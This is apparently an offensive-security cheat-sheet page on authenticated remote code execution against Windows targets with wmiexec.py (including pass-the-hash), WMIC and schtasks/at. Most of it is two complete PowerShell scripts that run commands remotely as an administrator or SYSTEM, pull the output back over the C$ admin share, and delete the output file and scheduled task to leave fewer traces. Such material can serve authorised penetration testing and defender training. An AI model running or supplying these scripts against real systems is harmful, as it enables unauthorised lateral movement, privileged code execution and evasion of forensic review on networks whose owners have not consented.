Authenticated RCE
Remote code execution on Windows target using legitimate credentials:
The content below should be moved to its dedicated section:
Automated Tools
wmiexec.py
Executes a command or a semi-interactive shell using Windows Management Instrumentation (WMI).
wmiexec.py [DOMAIN/]<USERNAME>[:PASSWORD]@<HOST> [command]
- If you don't specify any [command], it runs a semi-interactive shell (C:\>).
- If you don't specify any [password], it prompts you to input the password interactively.
Commands are launched over WMI (DCOM, 135/TCP plus a dynamic high port), but by default the output is written to and read back from the ADMIN$ share, so 445/TCP must also be reachable (use -nooutput if it is not).
Tip
Use -hashes LMHASH:NTHASH instead of specifying a password to authenticate using the pass-the-hash technique. The LM half may be left empty (-hashes :NTHASH) when only the NT hash is known.
Manual Process
WMIC
wmic /node:[targetIP] /user:[admin_user] /password:[password] process call create [command]
If you leave off /user and /password, it passes through the existing user's credentials (see SMB Sessions). Note that process call create only reports the ReturnValue and ProcessId of Win32_Process.Create (0 means success); the command's output is not returned and stays on the target.
Tip
Replace [targetIP] with @[filename] to run [command] on every IP listed in the file.
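An added example, not code from the original page, showing the WMIC technique above end to end from a PowerShell prompt: because Win32_Process.Create returns no output, the command is wrapped in cmd.exe with its output redirected to a file on the target, and that file is then read back over the C$ admin share. The target address, account, password, command and temp-file path are assumed placeholders.

```powershell
# Added example (not part of the original page): run a command on a remote host through
# WMIC and pull its output back. Win32_Process.Create only returns a ReturnValue and a
# ProcessId, so the command is wrapped in cmd.exe with its output redirected to a file
# on the target, which is then read over the C$ admin share.
# $Target, $User, $Password, $Command and the temp file path are assumed placeholders.
param(
    [string]$Target   = "10.0.0.5",          # assumed: target IP
    [string]$User     = "CORP\admin_user",   # assumed: local admin on the target
    [string]$Password = "Passw0rd!",         # assumed: its password
    [string]$Command  = "whoami /all",       # assumed: command to run (no embedded quotes)
    [int]$TimeoutSeconds = 30
)

$remoteFile = 'C:\Windows\Temp\wmi_out.txt'                 # path as seen on the target
$shareFile  = "\\$Target\C`$\Windows\Temp\wmi_out.txt"      # same file via the admin share

# cmd.exe interprets the redirection on the target; 2>&1 also captures errors.
$payload = "cmd.exe /c $Command > $remoteFile 2>&1"

# wmic prints the out-parameters of Win32_Process.Create, e.g. "ReturnValue = 0;".
# PowerShell passes $payload as a single double-quoted argument because it contains spaces.
$out = wmic /node:$Target /user:$User /password:$Password process call create $payload
$m = $out | Select-String -Pattern 'ReturnValue = (\d+)'
if (-not $m) { throw "No ReturnValue in wmic output:`n$($out -join "`n")" }
$rv = [int]$m.Matches[0].Groups[1].Value
# Documented Win32_Process.Create codes: 0 ok, 2 access denied, 3 insufficient privilege,
# 8 unknown failure, 9 path not found, 21 invalid parameter.
if ($rv -ne 0) { throw "Win32_Process.Create failed, ReturnValue=$rv" }

# Map the admin share with the same credentials and wait for the output file to appear.
net use "\\$Target\C`$" $Password /user:$User | Out-Null
$deadline = (Get-Date).AddSeconds($TimeoutSeconds)
while (-not (Test-Path $shareFile) -and (Get-Date) -lt $deadline) { Start-Sleep -Seconds 1 }
if (Test-Path $shareFile) {
    Get-Content $shareFile
    Remove-Item $shareFile -Force      # remove the artifact left on the target
} else {
    Write-Warning "Output file did not appear within $TimeoutSeconds s; the process may still be running"
}
net use "\\$Target\C`$" /delete | Out-Null
```

WMIC itself is deprecated and is no longer installed by default on recent Windows 11 builds; the same Win32_Process.Create call can be issued from PowerShell with Invoke-CimMethod over WSMan or DCOM, with the same output-retrieval problem.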
schtasks and at
This process registers a job with the Task Scheduler service on the remote target that runs a command at a time in the very near future. The job fires according to the target's clock, which is why its time is checked first. at.exe is deprecated and refuses to run on Windows 8 / Server 2012 and later ("The AT command has been deprecated"); schtasks works on all supported versions.
1. Establish an SMB session to the target:
net use \\[targetIP] /u:[admin_user]
2. Verify that the Schedule service is running and start it if not:
sc \\[targetIP] query schedule
sc \\[targetIP] start schedule
3. Check the current local time on the target machine:
net time \\[targetIP]
4. Schedule the job:
at \\[targetIP] [HH:MM] [A|P] [command]
schtasks /create /tn [taskname] /s [targetIP] /u [user] /p [password] /sc [frequency] /st [HH:MM] /sd [startdate] /tr [command]
/st takes a 24-hour HH:MM value. Use /sc once for a one-shot job, and add /ru SYSTEM to run [command] as LocalSystem instead of the scheduling account.
5. Verify the job status:
at \\[targetIP]
schtasks /query /s [targetIP]
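An added example, not code from the original page, that strings the five manual steps above into one PowerShell script using schtasks (at.exe being deprecated). The start time is computed from the target's own clock as returned by net time rather than from the attacking host. The target address, account, password, command and task name are assumed placeholders.

```powershell
# Added example, not from the original page: the five manual steps as one script, using
# schtasks rather than the deprecated at.exe. The task fires on the target's clock, so the
# start time is derived from "net time" against the target, not from the local machine.
# $Target, $User, $Password, $Command and $TaskName are assumed placeholders.
param(
    [string]$Target   = "10.0.0.5",                                        # assumed target IP
    [string]$User     = "CORP\admin_user",                                 # assumed local admin
    [string]$Password = "Passw0rd!",                                       # assumed password
    [string]$Command  = 'cmd.exe /c whoami > C:\Windows\Temp\task_out.txt', # output lands on the target
    [string]$TaskName = "SysMaint",                                        # assumed task name
    [int]$DelayMinutes = 2
)

# 1. Establish an SMB session so net.exe and sc.exe authenticate as $User.
net use "\\$Target\IPC`$" $Password /user:$User | Out-Null
if ($LASTEXITCODE -ne 0) { throw "net use to \\$Target failed" }

# 2. The Task Scheduler ('Schedule') service must be running. In PowerShell 'sc' is an
#    alias for Set-Content, so the service controller has to be invoked as sc.exe.
$running = sc.exe "\\$Target" query schedule | Select-String -Quiet 'STATE\s*:\s*4\s+RUNNING'
if (-not $running) {
    sc.exe "\\$Target" start schedule | Out-Null
    Start-Sleep -Seconds 3
}

# 3. Read the target's clock. net time prints "Current time at \\HOST is <date> <time>";
#    the date format follows the culture in use, which is what [datetime]::Parse assumes.
$line = net time "\\$Target" | Select-String -Pattern '\bis (.+)$'
if (-not $line) { throw "Could not read remote time from \\$Target" }
$remoteNow = [datetime]::Parse($line.Matches[0].Groups[1].Value.Trim())

# 4. Schedule a one-shot task a couple of minutes ahead. /st is 24-hour HH:mm, /ru SYSTEM
#    runs the command as LocalSystem, /f overwrites a task of the same name. If the run
#    time rolls over midnight, pass /sd with that date too (format follows the locale).
$runAt = $remoteNow.AddMinutes($DelayMinutes).ToString('HH:mm')
schtasks /create /s $Target /u $User /p $Password /tn $TaskName /sc once /st $runAt /ru SYSTEM /tr $Command /f
if ($LASTEXITCODE -ne 0) { throw "schtasks /create failed" }

# 5. Verify it was registered (Status, Next Run Time, Task To Run are in the verbose listing).
schtasks /query /s $Target /u $User /p $Password /tn $TaskName /v /fo LIST

# After it has fired, remove the task so less is left behind:
#   schtasks /delete /s $Target /u $User /p $Password /tn $TaskName /f
```

The task's output file is written on the target (here C:\Windows\Temp\task_out.txt) and can be collected afterwards through the C$ admin share with the same credentials; scheduled-task creation is logged on the target (Task Scheduler operational log, and Security event 4698 when auditing is enabled), so the task name and command line are what a defender will see.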